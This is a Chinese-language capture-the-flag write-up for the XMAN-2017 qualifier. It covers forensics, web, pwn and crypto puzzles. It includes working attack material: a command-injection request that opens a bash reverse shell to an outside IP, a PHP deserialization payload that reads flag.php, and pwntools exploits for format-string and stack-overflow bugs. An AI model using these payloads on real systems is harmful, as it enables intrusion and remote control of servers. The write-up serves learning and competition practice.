[XMAN-2017-資格賽]

(MISC) Prety Cat

strings filename.jpg
在 jpg 的空域中發(fā)現(xiàn)兩個(gè)類似Base64的字符串
解碼然后連起來

(MISC) Green_Code

下載流量包 , WireShark打開
很明顯就可以看到許多DNS的流量包 , 向 8.8.8.8 查詢某域名的A記錄

image.png

看起來像是 Base64
其實(shí)熟悉 Tcp Over DNS 的小伙伴兒一眼就能想到這是通過 DNS 傳輸數(shù)據(jù)

這里其實(shí)挺奇怪的 , 正常情況下
利用 DNS 傳輸數(shù)據(jù) , 應(yīng)該是接受者可以控制一個(gè)域名的權(quán)威服務(wù)器
然后將要傳輸?shù)臄?shù)據(jù)以域名中可以使用的字符進(jìn)行編碼
作為子域名構(gòu)成一個(gè)新的域名
然后按照固定的順序?qū)@個(gè)新的域名進(jìn)行請(qǐng)求
然后在這個(gè)域名的權(quán)威服務(wù)器上就可以接收到編碼后的數(shù)據(jù)
根據(jù)編碼規(guī)則再解碼即可
但是這道題挺奇怪的 , 并不是查詢百度的子域名
感覺流量包的場(chǎng)景不太對(duì)
猜想可能是攻擊者在內(nèi)網(wǎng)中已經(jīng)劫持了內(nèi)網(wǎng)的域名服務(wù)器(這里我不太確定 , 暫時(shí)不是很清楚)
我的理解應(yīng)該是 : 
data[min, max].encode("base64")+".baidu.com"

然后我們要根據(jù)時(shí)間順序來將所有的這種DNS查詢都導(dǎo)出 , 然后再Base64解碼
這里前幾天學(xué)到的 tcpdump 剛好可以派上用場(chǎng)

tcpdump -s 0 -n port 53 -r 0be46d01-29d6-4052-9211-da85cfc922c6.pcapng
# 然后使用 baidu 對(duì)其進(jìn)行過濾
tcpdump -s 0 -n port 53 -r 0be46d01-29d6-4052-9211-da85cfc922c6.pcapng | grep baidu
# 然后使用 awk 提取出其中的 Base64
tcpdump -s 0 -n port 53 -r 0be46d01-29d6-4052-9211-da85cfc922c6.pcapng | grep baidu | awk -F '.' '{print $12}'

將其重定向到一個(gè)文本文件 , 然后使用 python 逐行讀取

image.png

將其打印出來以后發(fā)現(xiàn)存在

'a98', 'FIG'
image.png

應(yīng)該是一個(gè) GIF 圖片, 因?yàn)?GIF 圖片的文件頭是 GIF89a

或者直接使用 cat log | base64 -d
也可以發(fā)現(xiàn)文件頭

image.png
with open("data.gif", "wb") as image, open("log") as f:
    for line in f:
        image.write(line.decode("base64")[::-1])
data.gif

有黑白的塊在閃爍 , 猜想可能是一種信號(hào)的編碼
使用工具將其所有幀導(dǎo)出 , 該圖片幀數(shù)為 625 , 恰好和 25x25 的二維碼一致
而且題目名稱也為 QRCODE
這樣思路就比較明確了 , 將這里的所有幀拼起來 , 組成一個(gè)二維碼即可

image.png
image.png

每一張圖片都是 8x8 , 因此我們只需要?jiǎng)?chuàng)建一個(gè) 8x25 即 200 * 200 的圖片來保存這個(gè)完整的二維碼即可

#!/usr/bin/env python

from PIL import Image

Im = Image.new("L", (200, 200))

for x in range(25):
    for y in range(25):
        filename = "IMG%05d.bmp" % (x * 25 + y)
        im = Image.open(filename)
        Im.paste(im, (x * 8, y * 8, x * 8 + 8, y * 8 + 8))

Im.save("result.bmp")
result.png

暫時(shí)只做到這一步 , 比賽結(jié)束后問過了出題人 , 出題人說需要了解二維碼的編碼原理 , 手逆二維碼

找到一個(gè)二維碼ISO標(biāo)準(zhǔn)

ISO/IEC 18004
QR Code Tutorial
正在繼續(xù)做這個(gè)題目 , 筆記在此處

(Misc) PDF_HACK

C:\Users\WangYihang\Desktop\pdfcrack-0.11>pdfcrack.exe -f data.pdf -w password.l
ist
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -4
Length: 128
Encrypted Metadata: True
FileID: 2923be84e16cd6ae529049f1f1bbe9eb
U: b9816d83ce3d5f690a988085997fc0a528bf4e5e4e758a4164004e56fffa0108
O: 677e06f73b20cb0e76b396c4e1dc12db7f827ba900fd813477d1c45c11d07ddd
found user-password: '20170716'
```
---
#### (Web) WElCOME2IRC
![image.png](http://upload-images.jianshu.io/upload_images/2355077-29adb4ec463dcc5b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

---
#### (Web) Variacover
![image.png](http://upload-images.jianshu.io/upload_images/2355077-e4a01e7491805726.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

---
#### (Web) UrlDecode
```
將XMAN兩次URL編碼傳入
```
---

#### (Web) php Seri
```
http://challenges.xctf.org.cn:7774/?code=O:9:%22FileClass%22:1:{s:8:%22filename%22;s:57:%22php://filter/read=convert.base64-encode/resource=flag.php%22;}
```
---
#### (Web) php
```
http://localhost/php/?aaa=0x1&bbb={%22ccc%22:%22999999a%22,%22ddd%22:[[%22XMAN%22,%221%22],%22XMAN%22]}
但是沒有搞出來
```

---
#### (Web) Download
```
1. 掃描得到 README.md (得知是使用了 Codiad 一個(gè)WEB IDE)
# README.md
# Codiad Web IDE

Codiad is a web-based IDE framework with a small footprint and minimal requirements. The system is still early in development, and while it has been proven extremely stable please be sure have a backup system if you use it in any production work.

Keep up to date with the latest changes and news on **[Twitter](http://twitter.com/codiadide)** or **[Facebook](http://www.facebook.com/Codiad)**

For more information on the project please check out the **[check out the Wiki](https://github.com/Codiad/Codiad/wiki)** or **[the Codiad Website](http://www.codiad.com)**

Distributed under the MIT-Style License. See `LICENSE.txt` file for more information.
```
通過測(cè)試發(fā)現(xiàn)存在搜索功能 , 可以直接搜索 php 文件 , 搜索路徑部分可控 , 但是無法穿越到上層
但是通過 BurpSuite 抓包發(fā)現(xiàn)事實(shí)上搜索的匹配結(jié)果也是顯示出來的 , 只不過沒有在 Web 上面顯示
而且對(duì)搜索的字符串沒有進(jìn)行過濾 , 這樣思路就比較清晰了
其實(shí)就類似于代碼審計(jì)的過程
可以利用這個(gè)搜索接口來搜索危險(xiǎn)的php函數(shù)
發(fā)現(xiàn)搜索 shell_exec 可以得到如下結(jié)果
![image.png](http://upload-images.jianshu.io/upload_images/2355077-414e16fb184e3970.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```
命令如下: 
$output = shell_exec('find -L ' . $this->path . ' -iregex  \".*' . $this->search_file_type  . '\" -type f | xargs grep -i -I -n -R -H \"' . $input . '\"');

再進(jìn)一步對(duì)這個(gè) shell 命令中的參數(shù)進(jìn)行溯源 , 發(fā)現(xiàn) input 參數(shù)比較容易利用而且似乎并沒有過濾
這樣就直接造成了命令執(zhí)行
但是好像并沒有回顯
本地搭建類似環(huán)境進(jìn)行測(cè)試
shell_exec 這個(gè)函數(shù)中是可以使用換行符的
也就是說 , 只要其中的某一個(gè)參數(shù)可控 , 就可以執(zhí)行任意命令
view-source:http://localhost/exec/?p=.&t=1111111%22%0aping%20-c1%20120.24.215.80%0agrep%20%22111111&i=11111
最終利用該漏洞反彈shell即可
```

![image.png](http://upload-images.jianshu.io/upload_images/2355077-5e7c668229c607e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```
POST /components/filemanager/controller.php?action=search&path=admin&type=0 HTTP/1.1
Host: challenges.xctf.org.cn:7775
Content-Length: 137
Accept: */*
Origin: http://challenges.xctf.org.cn:7775
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://challenges.xctf.org.cn:7775/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: 40d1b2d83998fabacb726e5bc3d22129=dfbb133e60a03591b2b19fc1c3203ea6; token=egjrjA4NB4wDHMX5CSDDxAzIEGqt8dq8
Connection: close

search_string=1&search_file_type=1111111"%0a%2Fbin%2Fbash+-c+%27sh+-i+>%26+%2Fdev%2Ftcp%2F120.24.215.80%2F8888+0>%261%27%0agrep%20"111111
```
---
#### (Web) Upload
```
# 聽大佬說是上傳 .htaccess 最終 getshell , 先挖坑 , 復(fù)現(xiàn)了以后再寫
不能上傳 phtml php5
上傳 php3 php4 phps pht 不會(huì)解析
```
#### (Web) XSS
```
# 利用 link 的 prefetch 屬性繞過 csp
<link rel='prefetch' >
查看返回 referer
然后手動(dòng)訪問 , 在 cookie 中發(fā)現(xiàn) flag
```
---
#### (Pwn) Taaa
```
# 很基礎(chǔ)的格式化字符串修改變量
# 目標(biāo)內(nèi)存地址在棧上 , 可以直接通過 %N$hhn 的形式對(duì)其覆蓋
# 然后在這個(gè)格式化字符串之前填補(bǔ)長(zhǎng)度為 85 的 junk 即可
#!/usr/bin/env python

from pwn import *

# Io = process("./fmt")
Io = remote("challenges.xctf.org.cn", 14001)

payload = "A" * 0x55
payload += "%9$hhn"

Io.sendline(payload)

Io.interactive()
```

---
#### (Pwn) Caaa
```
# 棧溢出覆蓋返回地址 , 存在 hack 函數(shù) , 直接跳轉(zhuǎn)到 system("/bin/sh") 即可
#!/usr/bin/env python

from pwn import *

# Io = process("./Caaa")
Io = remote("challenges.xctf.org.cn", 14000)

junk = "A" * 40
hackInfo = p64(0x40078F)

payload = junk + hackInfo

Io.sendline("1")

Io.sendline(payload)

Io.interactive()
```
---
#### (Crypto) Maxonic
```
豬圈密碼 題目提示 XMAN{----flag----}
豬圈密碼解出來 : THE ANSWER IS FLASE
嘗試了各種flag格式
純小寫 , 加空格 , 沒有 ----
```
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 230,825評(píng)論 6 546
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 99,814評(píng)論 3 429
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 178,980評(píng)論 0 384
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)。 經(jīng)常有香客問我,道長(zhǎng),這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 64,064評(píng)論 1 319
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 72,779評(píng)論 6 414
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 56,109評(píng)論 1 330
  • 城市分裂傳說
    那天,我揣著相機(jī)與錄音,去河邊找鬼。 笑死,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 44,099評(píng)論 3 450
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 43,287評(píng)論 0 291
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 49,799評(píng)論 1 338
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 41,515評(píng)論 3 361
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 43,750評(píng)論 1 375
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 39,221評(píng)論 5 365
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 44,933評(píng)論 3 351
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 35,327評(píng)論 0 28
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,667評(píng)論 1 296
  • 情欲美人皮
    我被黑心中介騙來泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 52,492評(píng)論 3 400
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 48,703評(píng)論 2 380

推薦閱讀更多精彩內(nèi)容